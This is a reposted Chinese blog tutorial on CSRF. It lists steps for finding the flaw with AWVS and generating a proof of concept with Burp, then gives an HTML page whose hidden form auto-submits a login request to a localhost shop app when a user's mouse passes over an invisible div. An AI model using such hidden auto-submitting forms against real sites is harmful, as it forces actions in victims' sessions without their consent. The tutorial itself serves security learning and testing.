首页 > 其他 > 详细

CSRF对表单派发事件

时间:2020-03-11 13:36:59      阅读:51      评论:0      收藏:0      [点我收藏+]

1、使用AWVS检测CSRF漏洞

2、使用burp生成poc

3、对poc进行修改

<html>
  <!-- CSRF自动登录poc -->
    <body>
        <script>
            function login(){
                document.getElementById("myForm").submit()
                // <input type="submit" onmouseover="login()" value="tijiao"/>,name值不可以为submit,否则提交失败
            }
        </script>
            <form id="myForm" action="http://localhost/store/user?method=login" method="GET">
                  <input type="hidden" name="username" value="test" />
                  <input type="hidden" name="password" value="test" />
                  <div onmouseover="login()">&nbsp;</div>
            </form>
    </body>
</html>

4、等用户划过指定的div,触发事件,实现登录

技术分享图片

 

 5、登录成功

技术分享图片

 

CSRF对表单派发事件

原文:https://www.cnblogs.com/smartmsl/p/12461765.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!